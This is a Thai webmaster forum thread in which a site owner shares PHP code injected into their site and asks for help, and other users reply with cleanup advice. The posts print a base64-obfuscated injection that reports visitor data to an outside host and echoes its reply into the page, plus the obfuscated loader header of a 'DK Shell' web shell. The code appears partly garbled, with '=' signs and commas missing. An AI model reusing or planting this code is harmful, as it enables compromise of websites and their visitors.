ThaiSEOBoard.com

ความรู้ทั่วไป => General (ถามคุยวิชาการ IM) => ข้อความที่เริ่มโดย: muay5157 ที่ 17 พฤษภาคม 2013, 10:00:15


หัวข้อ: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: muay5157 ที่ 17 พฤษภาคม 2013, 10:00:15
โค๊ด:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry 1;
    // This code use for global bot statistic
    $sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle NULL;
    $stCurlLink "";
    if((strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink base64_decode'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O"
     {$sResult[0]=" ";
      echo $sResult// Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

อยากทราบว่า มันคือ code อะไรกัน กัน bot ให้วิ่งเข้ามา หรืออย่างไร? พอจะมีใครทราบมั้ยครับ

กลัวมากเลย เมื่อวานยังไม่มี วันนี้อยู่ๆก็มีขึ้นมา  :wanwan035:

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: flash ที่ 17 พฤษภาคม 2013, 11:16:32
เห็นมีกระทู้ก่อนหน้าโดนแบบนี้เหมือนกัน แต่ไม่รู้ตอนนี้เจ้าของเค้าแก้ไขยังไงแล้ว ลองหาดูครับ

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: noohinter ที่ 17 พฤษภาคม 2013, 11:24:45
เคยโดนเหมือนกันแบบนี้ โดนยก host เลย มันมาแปะทุก file ที่เป็น index

ทางที่ดี ก็เปลี่ยน password cpanel แล้วก็ลง wordpress ใหม่เลยคะ

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: Serge ที่ 17 พฤษภาคม 2013, 11:45:00
ใช่เลยครับ Code นี้และ!! โดนเจาะแล้วๆๆๆๆๆ  :wanwan009:

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: 01111225 ที่ 17 พฤษภาคม 2013, 11:48:00
ลบโค้ดออก แล้วก็ เปลี่ยน pass  ftp เถอะเถ้าเจอแบบนี้ ติดตั้งโปรแกรม สแกนที่เครื่องตัวเองด้วย มันมาจากเครื่องของเรา โดยส่วนมาก

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: siriyot00 ที่ 17 พฤษภาคม 2013, 11:57:25
หลักการทำงานของมัน น่าจะเป็นแบบนี้นะ ลองเข้าไป   :P

http://www.youtube.com/watch?v=MEw53PwmfUA

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: treehost ที่ 17 พฤษภาคม 2013, 12:05:38
อัพเดท  Wordpress  เป็นเวอร์ชั่นใหม่ล่าสุด ระวังโดน Hack กับ Backdoor-Linux นะครับ

ใครยังไม่อัพรีบอัพโดยด่วน  :wanwan007: :wanwan007: :wanwan007:

น้องผมลองมาแล้ว Wordpress เก่าๆ ใช้เวลาเจาะเข้าไปแก้ไฟล์ฐานข้อมูลภาย 30 วินาที

 :wanwan004: :wanwan004: :wanwan004: :wanwan004:

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: iak1 ที่ 17 พฤษภาคม 2013, 13:42:36
อ้างจาก: siriyot00 ที่ 17 พฤษภาคม 2013, 11:57:25
หลักการทำงานของมัน น่าจะเป็นแบบนี้นะ ลองเข้าไป   :P

[url]http://www.youtube.com/watch?v=MEw53PwmfUA[/url]



Jump Domain มันสคิปหลอกเด็กของแก๊งนม หนิครับ    :wanwan001:
คลิปนี้ตาเล็กเอามาจำแหละ  แฉให้ดูการทำงาน

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: iteasy2u ที่ 17 พฤษภาคม 2013, 13:52:50
ระวังกันให้มากๆนะครับ

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: PAGE ที่ 17 พฤษภาคม 2013, 14:23:14
โดนแล้วครับ

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: kenessar ที่ 17 พฤษภาคม 2013, 14:53:19
base64_decode

นั่นปะไร

ลองหาปลั๊กอิน Wordpress Aniti Virus มาลงครับ แล้วสแกนเทมเพลท http://wordpress.org/extend/plugins/antivirus/
กับปลั๊กอิน Limit Login Attempt มาลงครับ http://wordpress.org/extend/plugins/limit-login-attempts/

แล้วเปลี่ยนรหัสผ่านเข้า FTP

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: hatyaiwebdesign ที่ 17 พฤษภาคม 2013, 15:57:23
base64_decode

ผมเห็นส่วนใหญ่มากับ theme เถื่อน

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: songwutk ที่ 17 พฤษภาคม 2013, 18:23:28
อ้างจาก: hatyaiwebdesign ที่ 17 พฤษภาคม 2013, 15:57:23
base64_decode

ผมเห็นส่วนใหญ่มากับ theme เถื่อน

ทำให้ผมนึกถึง คลิป review cms atomymaxsite โดยคุณตาเล็ก windows 98se ครับ

**** แก้ข้อความ กลัวพาดพิงบางอย่างทำให้โดนระงับบัญชีเว็บนี้ ****

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: muay5157 ที่ 17 พฤษภาคม 2013, 22:16:48
อ้างจาก: hatyaiwebdesign ที่ 17 พฤษภาคม 2013, 15:57:23
base64_decode

ผมเห็นส่วนใหญ่มากับ theme เถื่อน

เว็บนี้ ผมเขียน code สดเองหมดเลยครับ  มีแค่ บทความอย่างเดียว ที่ใช้ wordpress และ ก็เป็น หน้าแยก โดดๆด้วย ไม่เกี่ยวกับ Code โดยรวม

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: zidit ที่ 17 พฤษภาคม 2013, 23:10:33
ลบทิ้งครับ แล้วเปลี่ยนพาส


หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: muay5157 ที่ 17 พฤษภาคม 2013, 23:50:09
ล่าสุด มีอันนี้ ด้วย ครับ

โค๊ด:
<?php 
//
//                                  DK Shell - Took the Best made it Better..!!
//
//
//
//Version 1.0 
//Created on 25/3/2012 by b47chguru
$auth_pass "81dc9bdb52d04dc20036dbd8313ed055"	//password = dk 
$color "#00FF66";	//Colour
$default_action "FilesMan";
$default_charset "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65  

แถมต่อจากนี้ ยาวมากกกกก เซฟ ใส่ ข้อความ มาโพส ไม่หมดครับ  :X เคียดแค้นอะไรผมนักหนา -_-

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: makoto ที่ 18 พฤษภาคม 2013, 13:59:25
มาบอกวิธีครับ เคยโดนมาก่อน ปัจจุบันก็น้อยลงแล้วเหมือนอาการจะหายไปบางเว็บ แต่บางเว็บก็ยังคงแก้ไม่หาย ส่วนใหญ่เป็นที่ wordpress แต่ก็เคยเจอเว็บเขียนเองด้วย ถูกเพิ่ม code ลงไป

สาเหตุหลักคือ

1. เป็นที่ theme ฟรีที่มีแจก (ผมเคยเจอใน theme ที่ซื้อมาด้วย 1 อัน จึงคิดว่ามันน่าจะติดจากเว็บใน host เดียวกัน)
2. เป็นที่เว็บใน host เครื่องเดียวกัน อาจไม่ใช่เว็บเราที่เป็นตัวติดตัวแรก แต่มันจะเจาะเข้าทุกเว็บใน host เดียวกันทั้งหมด
3. แก้ pass เปลี่ยน user หรืออะไรก็แล้วแต่ มันก็ไม่หาย มันจะมาประมาณต้นๆ เดือด ฝังไว้ทุกๆ ไฟล์ใน index และไฟล์ที่มันเห็นว่าใช้งานได้ดี เช่น footer, header, single, slide หรือแม้แต่ไฟล์กากๆ อย่าง readme.html
4. มันจะฝัง script อย่างว่านั่นไปทุกๆ ไฟล์ในข้อ 3 (จุดสังเกตุคือ หากไปเจอไฟล์ไหนติด ดูวันที่สร้างไฟล์หรือวันที่ update แล้วจัดการลบไฟล์ทั้งหมดในวันที่ๆ มีการ update นั้นออกแล้วแทนที่ไฟล์อันใหม่เข้าไป)
5. จะมีไฟล์ counter.php ที่ถูกสร้างขึ้นเพื่อเป็นตัวเรียกใช้ ลบมันซะ
6. ในทุกๆ folder ควรตรวจสอบ แม้กระทั่งในแคช

วิธีแก้ ถ้าเว็บเราโดนเป็นตัวหลักและเป็นตัวกระจายไปสู่เว็บอื่น ให้เราลบไฟล์ทั้งหมด แล้ว upload ขึ้นไปใหม่ ไม่นานมันจะหายไปเอง แต่ถ้าเว็บเราไม่ใช่เว็บหลัก ยังไงก็แก้ไม่หายแม้จะเปลี่ยน user pass หรืออะไรก็ตาม ทางแก้ดีที่สุดคือ ย้าย hosting ไปไกลๆ จากผู้ให้บริการรายนี้

ิวิธีเอาตัวรอดไปแต่ละเดือน

1. ทำการแก้ไฟล์ config ให้ไปเรียกใช้ user pass ในไฟล์ใหม่ที่เราสร้างไว้ใน folder ใน cgi-bin แทน และเวลาเปลี่ยน pass มันจะง่ายสำหรับเรา แก้ไฟล์เดียวใช้ได้ทุกเว็บ กรณีใช้ pass อันเดียวกัน เช่น มี subdomain เพราะมันจะมาแน่ เดือนละครั้ง ทำจนกว่ามันจะขี้เกียจเข้ามาฝัง
2. เปลี่ยน pass ftp แล้วให้ทำการลบไฟล์ทุกไฟล์ที่เป็นชื่อ index.php (ในทุกๆ folder) ไม่ว่าไฟล์นั้นจะถูกฝังหรือไม่ได้ถูกฝัง
2. ตรวจดูวันที่ถูกแก้ไข จากไฟล์ที่ถูกฝังสคริปไว้ แล้ว search หาจากวันที่ คุณจะได้ไฟล์ตัวปัญหา
3. จัดการลบมันให้หมด และ upload ไฟล์ใหม่ที่สะอาดเข้าไปแทน (อย่าใช้การแทนที่ เพราะมันจะไม่แก้ปัญหานี้ให้กับคุณ) ทำทุก folder
4. ตั้ง chmod เป็น 444 ในทุกๆ ไฟล์ที่คุณ upload จากข้อ 3
5. เข้าไป update cmd ให้เป็นอันล่าสุดทันที และ upload plug-in ด้วย แม้ว่ามันจะเป็นอันล่าสุดแล้วก็ตาม

** ให้ลบไฟล์ที่โดนฝังออกก่อนนะครับ แล้วค่อย upload ขึ้นไปใหม่ ถ้าลากไฟล์ไป replace จะไม่หาย **

ทำไมผมถึงต้องบอกว่า ถ้าไม่ใช่เราติด ก็มาจากเว็บอื่นใน host เดียวกันทำให้เราติด แล้วทำไมถึงแก้ไม่หาย ก็ถ้าไม่ได้ไปลบไฟล์ต้นเหตุ แก้ยังไงก็ไม่หายหรอกครับ ทำได้แค่ลบๆ และลบ ขึ้นอยู่กับว่ามันจะมาบ่อยแค่ไหนเท่านั้น
อย่างแรกคือ ผมไปเจอบทความอันนึงของกลุ่ม UHT : Unlimited Hack Team เค้าระบุว่าสามารถเจาะ CMS แข็งๆ อย่าง wp ได้ง่ายๆ หากสามารถ upload shell ได้จาก host ไหนซักแห่งและสามารถเข้าถึงเว็บและไฟล์ได้ทุกไฟล์ใน host นั้น ยิ่งเป็นระบบ cPanel ยิ่งง่ายเพราะเค้าสอนกันโครมๆ ในการ hack ระบบพวกนี้

ถ้าขี้เกียจหรือไม่ได้จริงๆ แนะนำให้ย้าย host ครับ เพราะการลบและไป upload แค่ไฟล์ index.php ผมก็ว่าเครียดหนัก สำหรับผมมีในมือไม่กี่เว็บยังเหนื่อย ถ้ามีหลายเว็บนี่ถึงขั้นสาปส่งกันเลยทีเดียว

หลักการทำงานของ script ที่มันฝังไว้ ลองแกะดูคร่าวๆ ผมก็ไม่เก่งหรอก แต่ดูเหมือนเวลาเปิดเว็บในบางระบบของ browser มันจะบังคับให้เราติดตั้งหรือ active อะไรซักอย่างลงไป (ผมก็ยังไม่เคยลงกด ok) แล้วมันก็อาจจะได้ Traffic จากผู้ชมในเว็บเราไปใช้กับเว็บมันด้วย (อันนี้เดาเอานะ) และมันจะทำให้เว็บเราคนเข้าน้อยลงเรื่อยๆ เพราะอะไรก็ไม่รู้

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: 24Million ที่ 18 พฤษภาคม 2013, 14:48:51
...จะบอกว่าเมื่อก่อนผมเห็นเยอะมาก
เมื่อก่อนผมใช้ WP ชอบไปโหลดธีมไว้ ที่ผมเคยเห็น (เว็บผมเอง) จะมีลายเซ็นประเภทแกะไม่ออก ต้องเข้าไปแก้แบบนี้เหมือนกัน  :P

แต่ขนาดมัลแวร์นี่โชคดีไม่เคยโดนนะฮะ

เวลาโหลดธีมฟรี โดยเฉพาะไอ้ที่ (เถื่อน) แฮ็กธีมจ่ายตังค์ (พวกธีม Thesis อะไรงี้) ...ระวังให้มากๆ กันนะคับ

หัวข้อ: Re: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
เริ่มหัวข้อโดย: kenessar ที่ 16 มิถุนายน 2013, 23:32:09
อ้างจาก: makoto ที่ 18 พฤษภาคม 2013, 13:59:25
มาบอกวิธีครับ เคยโดนมาก่อน ปัจจุบันก็น้อยลงแล้วเหมือนอาการจะหายไปบางเว็บ แต่บางเว็บก็ยังคงแก้ไม่หาย ส่วนใหญ่เป็นที่ wordpress แต่ก็เคยเจอเว็บเขียนเองด้วย ถูกเพิ่ม code ลงไป

สาเหตุหลักคือ

1. เป็นที่ theme ฟรีที่มีแจก (ผมเคยเจอใน theme ที่ซื้อมาด้วย 1 อัน จึงคิดว่ามันน่าจะติดจากเว็บใน host เดียวกัน)
2. เป็นที่เว็บใน host เครื่องเดียวกัน อาจไม่ใช่เว็บเราที่เป็นตัวติดตัวแรก แต่มันจะเจาะเข้าทุกเว็บใน host เดียวกันทั้งหมด
3. แก้ pass เปลี่ยน user หรืออะไรก็แล้วแต่ มันก็ไม่หาย มันจะมาประมาณต้นๆ เดือด ฝังไว้ทุกๆ ไฟล์ใน index และไฟล์ที่มันเห็นว่าใช้งานได้ดี เช่น footer, header, single, slide หรือแม้แต่ไฟล์กากๆ อย่าง readme.html
4. มันจะฝัง script อย่างว่านั่นไปทุกๆ ไฟล์ในข้อ 3 (จุดสังเกตุคือ หากไปเจอไฟล์ไหนติด ดูวันที่สร้างไฟล์หรือวันที่ update แล้วจัดการลบไฟล์ทั้งหมดในวันที่ๆ มีการ update นั้นออกแล้วแทนที่ไฟล์อันใหม่เข้าไป)
5. จะมีไฟล์ counter.php ที่ถูกสร้างขึ้นเพื่อเป็นตัวเรียกใช้ ลบมันซะ
6. ในทุกๆ folder ควรตรวจสอบ แม้กระทั่งในแคช

วิธีแก้ ถ้าเว็บเราโดนเป็นตัวหลักและเป็นตัวกระจายไปสู่เว็บอื่น ให้เราลบไฟล์ทั้งหมด แล้ว upload ขึ้นไปใหม่ ไม่นานมันจะหายไปเอง แต่ถ้าเว็บเราไม่ใช่เว็บหลัก ยังไงก็แก้ไม่หายแม้จะเปลี่ยน user pass หรืออะไรก็ตาม ทางแก้ดีที่สุดคือ ย้าย hosting ไปไกลๆ จากผู้ให้บริการรายนี้

ิวิธีเอาตัวรอดไปแต่ละเดือน

1. ทำการแก้ไฟล์ config ให้ไปเรียกใช้ user pass ในไฟล์ใหม่ที่เราสร้างไว้ใน folder ใน cgi-bin แทน และเวลาเปลี่ยน pass มันจะง่ายสำหรับเรา แก้ไฟล์เดียวใช้ได้ทุกเว็บ กรณีใช้ pass อันเดียวกัน เช่น มี subdomain เพราะมันจะมาแน่ เดือนละครั้ง ทำจนกว่ามันจะขี้เกียจเข้ามาฝัง
2. เปลี่ยน pass ftp แล้วให้ทำการลบไฟล์ทุกไฟล์ที่เป็นชื่อ index.php (ในทุกๆ folder) ไม่ว่าไฟล์นั้นจะถูกฝังหรือไม่ได้ถูกฝัง
2. ตรวจดูวันที่ถูกแก้ไข จากไฟล์ที่ถูกฝังสคริปไว้ แล้ว search หาจากวันที่ คุณจะได้ไฟล์ตัวปัญหา
3. จัดการลบมันให้หมด และ upload ไฟล์ใหม่ที่สะอาดเข้าไปแทน (อย่าใช้การแทนที่ เพราะมันจะไม่แก้ปัญหานี้ให้กับคุณ) ทำทุก folder
4. ตั้ง chmod เป็น 444 ในทุกๆ ไฟล์ที่คุณ upload จากข้อ 3
5. เข้าไป update cmd ให้เป็นอันล่าสุดทันที และ upload plug-in ด้วย แม้ว่ามันจะเป็นอันล่าสุดแล้วก็ตาม

** ให้ลบไฟล์ที่โดนฝังออกก่อนนะครับ แล้วค่อย upload ขึ้นไปใหม่ ถ้าลากไฟล์ไป replace จะไม่หาย **

ทำไมผมถึงต้องบอกว่า ถ้าไม่ใช่เราติด ก็มาจากเว็บอื่นใน host เดียวกันทำให้เราติด แล้วทำไมถึงแก้ไม่หาย ก็ถ้าไม่ได้ไปลบไฟล์ต้นเหตุ แก้ยังไงก็ไม่หายหรอกครับ ทำได้แค่ลบๆ และลบ ขึ้นอยู่กับว่ามันจะมาบ่อยแค่ไหนเท่านั้น
อย่างแรกคือ ผมไปเจอบทความอันนึงของกลุ่ม UHT : Unlimited Hack Team เค้าระบุว่าสามารถเจาะ CMS แข็งๆ อย่าง wp ได้ง่ายๆ หากสามารถ upload shell ได้จาก host ไหนซักแห่งและสามารถเข้าถึงเว็บและไฟล์ได้ทุกไฟล์ใน host นั้น ยิ่งเป็นระบบ cPanel ยิ่งง่ายเพราะเค้าสอนกันโครมๆ ในการ hack ระบบพวกนี้

ถ้าขี้เกียจหรือไม่ได้จริงๆ แนะนำให้ย้าย host ครับ เพราะการลบและไป upload แค่ไฟล์ index.php ผมก็ว่าเครียดหนัก สำหรับผมมีในมือไม่กี่เว็บยังเหนื่อย ถ้ามีหลายเว็บนี่ถึงขั้นสาปส่งกันเลยทีเดียว

หลักการทำงานของ script ที่มันฝังไว้ ลองแกะดูคร่าวๆ ผมก็ไม่เก่งหรอก แต่ดูเหมือนเวลาเปิดเว็บในบางระบบของ browser มันจะบังคับให้เราติดตั้งหรือ active อะไรซักอย่างลงไป (ผมก็ยังไม่เคยลงกด ok) แล้วมันก็อาจจะได้ Traffic จากผู้ชมในเว็บเราไปใช้กับเว็บมันด้วย (อันนี้เดาเอานะ) และมันจะทำให้เว็บเราคนเข้าน้อยลงเรื่อยๆ เพราะอะไรก็ไม่รู้

ผมเคยโดนมาแล้วครับ แต่ไม่ใช่ iframe แต่เป็น Shell เลย
ตอนนั้น ใช้ Host Godaddy ผมเข้าผิดหน้า ปกติมันจะเข้า 404 แต่แปลก คราวนี้เข้าหน้าแปลกๆ สีดำ
ผมรู้เลยว่าผมโดนเข้าแล้ว ผมลองเล่นไอ้หน้าเพจนั้นดู ว่าจริงๆแล้วมันเป็นสคริปทีสามารถรัน Shell ได้

แล้วมันไม่ใช่แค่แฮ็คทุกเว็บในโฮสที่ผมเช่าครับ เท่าที่ลองเล่นดู ปรากฎว่า มันเข้าไปได้ทั้งโฮสเลย เอ้า เวรจริงๆ งี้ถ้าใครโดนแฮ็คซักเว็บนึง คนอื่นๆก็โดนด้วยสิครับ


SMF 1.1.21 | Simple Machines | ThaiSEOBoard.com